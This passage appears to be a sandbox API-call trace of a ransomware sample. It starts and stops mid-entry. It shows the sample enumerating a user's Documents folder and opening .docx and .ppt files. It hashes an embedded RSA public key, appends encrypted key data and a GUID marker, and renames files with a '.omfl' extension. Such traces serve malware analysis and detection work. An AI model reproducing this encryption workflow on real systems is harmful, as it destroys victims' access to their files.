lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.945] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\") returned="aFM0SjkBF-UdBxYLzMZ\\" [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.945] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf25d8 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.945] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf25d8 | out: hHeap=0x4970000) returned 1 [0131.945] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.945] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.945] PathFindFileNameW (pszPath="") returned="" [0131.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3449c5c0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x2f14e550, ftLastAccessTime.dwHighDateTime=0x1d5dafc, ftLastWriteTime.dwLowDateTime=0x2f14e550, ftLastWriteTime.dwHighDateTime=0x1d5dafc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.946] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3449c5c0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x2f14e550, ftLastAccessTime.dwHighDateTime=0x1d5dafc, ftLastWriteTime.dwLowDateTime=0x2f14e550, ftLastWriteTime.dwHighDateTime=0x1d5dafc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.946] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ce6280, ftCreationTime.dwHighDateTime=0x1d5da24, ftLastAccessTime.dwLowDateTime=0x41aac7c0, ftLastAccessTime.dwHighDateTime=0x1d5da39, ftLastWriteTime.dwLowDateTime=0x41aac7c0, ftLastWriteTime.dwHighDateTime=0x1d5da39, nFileSizeHigh=0x0, nFileSizeLow=0x1a23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Eev8nfzhtBF6Pcx_e7pu.docx", cAlternateFileName="EEV8NF~1.DOC")) returned 1 [0131.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0131.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.946] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\Eev8nfzhtBF6Pcx_e7pu.docx") returned=".docx" [0131.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\Eev8nfzhtBF6Pcx_e7pu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\eev8nfzhtbf6pcx_e7pu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.947] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=6691) returned 1 [0131.947] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.950] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x19fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.950] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.952] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.952] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x1a23, lpOverlapped=0x0) returned 1 [0131.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.952] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.952] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.953] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.953] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.953] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.953] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.953] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.953] GetLastError () returned 0x0 [0131.954] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.954] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.954] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.954] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.954] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1a20) returned 0x7579548 [0131.954] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf25d8 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172b0 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db7f0 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172c8 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172f8 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.954] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17310 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.955] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172f8 | out: hHeap=0x4970000) returned 1 [0131.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17310 | out: hHeap=0x4970000) returned 1 [0131.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17310 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.955] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd172f8 [0131.956] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x1a23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.956] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.956] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.956] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.956] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.956] CloseHandle (hObject=0x610) returned 1 [0131.957] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\Eev8nfzhtBF6Pcx_e7pu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\eev8nfzhtbf6pcx_e7pu.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\Eev8nfzhtBF6Pcx_e7pu.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\eev8nfzhtbf6pcx_e7pu.docx.omfl")) returned 1 [0131.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.959] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0131.960] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8cd61f0, ftCreationTime.dwHighDateTime=0x1d5e13d, ftLastAccessTime.dwLowDateTime=0xeebf4640, ftLastAccessTime.dwHighDateTime=0x1d5e6cb, ftLastWriteTime.dwLowDateTime=0xeebf4640, ftLastWriteTime.dwHighDateTime=0x1d5e6cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GG7LokQ3R5cq6 ylO", cAlternateFileName="GG7LOK~1")) returned 1 [0131.960] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fa0f50, ftCreationTime.dwHighDateTime=0x1d5dd16, ftLastAccessTime.dwLowDateTime=0xce1a2a50, ftLastAccessTime.dwHighDateTime=0x1d5e314, ftLastWriteTime.dwLowDateTime=0xce1a2a50, ftLastWriteTime.dwHighDateTime=0x1d5e314, nFileSizeHigh=0x0, nFileSizeLow=0xd62c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nqALBKJhNLw9.ppt", cAlternateFileName="NQALBK~1.PPT")) returned 1 [0131.960] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\nqALBKJhNLw9.ppt") returned=".ppt" [0131.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\nqALBKJhNLw9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\nqalbkjhnlw9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.961] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=54828) returned 1 [0131.961] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.963] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xd606, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.963] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.964] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xd62c, lpOverlapped=0x0) returned 1 [0131.965] lstrlenA (lpString="-----BEGIN PUBLIC 